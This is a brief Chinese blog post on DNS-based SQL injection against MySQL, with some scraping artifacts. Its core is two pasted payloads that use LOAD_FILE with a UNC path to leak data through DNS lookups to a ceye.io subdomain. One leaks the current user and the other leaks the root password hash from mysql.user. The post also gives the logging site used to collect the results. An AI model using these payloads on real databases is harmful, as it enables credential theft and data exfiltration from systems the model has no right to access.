小結--dns注入

0x01 雜言

最近實在是太忙了,考試都排滿了,晚上剛考完,補一下昨天的東西,寫一下dns注入。
咱們知道在盲注的時候,要用腳本去跑,在測試的時候效率就不是很高,這時候用dns注入每每事半功倍mysql

0x02 payload

這裏直接貼一下payloadsql

LOAD_FILE(CONCAT(0x5C5C,(HEX(USER())),0x2E3563733076642E636579652E696F5C313233))

下面這個是沒有引號的
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.[圖片]mysql.ip.port.xxxx.ceye.io\\abc'));

這裏上面的地址能夠用ceye.io這個網站去看dns的解析記錄測試

相關文章
相關標籤/搜索